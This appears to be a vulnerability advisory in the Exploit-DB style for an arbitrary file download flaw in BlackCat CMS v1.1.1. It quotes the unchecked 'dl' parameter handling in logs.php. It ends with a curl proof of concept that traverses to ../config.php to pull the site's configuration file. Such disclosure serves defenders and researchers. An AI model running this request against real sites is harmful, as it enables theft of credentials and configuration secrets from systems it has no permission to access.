45 lines
No EOL
2 KiB
Text
45 lines
No EOL
2 KiB
Text
# Exploit Title: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability
|
|
# Date: 2015/06/16
|
|
# Vendor Homepage: http://blackcat-cms.org/
|
|
# Software Link: http://blackcat-cms.org/temp/packetyzer/blackcatcms_2fo3PXdKj1.zip
|
|
# Version: v1.1.1
|
|
# Tested on: Centos 6.5,PHP 5.4.41
|
|
# Category: webapps
|
|
|
|
* Description
|
|
|
|
file:/modules/blackcat/widgets/logs.php
|
|
|
|
72 // download
|
|
73 if(CAT_Helper_Validate::sanitizeGet('dl'))
|
|
74 {
|
|
75 $file = CAT_Helper_Directory::sanitizePath(CAT_PATH.'/temp/'.CAT_Helper_Validate::sanitizeGet('dl')); <-- Not Taint Checking
|
|
76 if(file_exists($file))
|
|
77 {
|
|
78 $zip = CAT_Helper_Zip::getInstance(pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip');
|
|
79 $zip->config('removePath',pathinfo($file,PATHINFO_DIRNAME))
|
|
80 ->create(array($file));
|
|
81 if(!$zip->errorCode() == 0)
|
|
82 {
|
|
83 echo CAT_Helper_Validate::getInstance()->lang()->translate("Unable to pack the file")
|
|
84 . ": ".str_ireplace( array( str_replace('\\','/',CAT_PATH),'\\'), array('/abs/path/to','/'), $file );
|
|
85 }
|
|
86 else
|
|
87 {
|
|
88 $filename = pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip';
|
|
89 header("Pragma: public"); // required
|
|
90 header("Expires: 0");
|
|
91 header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
|
|
92 header("Cache-Control: private",false); // required for certain browsers
|
|
93 header("Content-Type: application/zip");
|
|
94 header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
|
|
95 header("Content-Transfer-Encoding: binary");
|
|
96 header("Content-Length: ".filesize($filename));
|
|
97 readfile("$filename");
|
|
98 exit;
|
|
99 }
|
|
100 }
|
|
|
|
|
|
POC:
|
|
curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip - |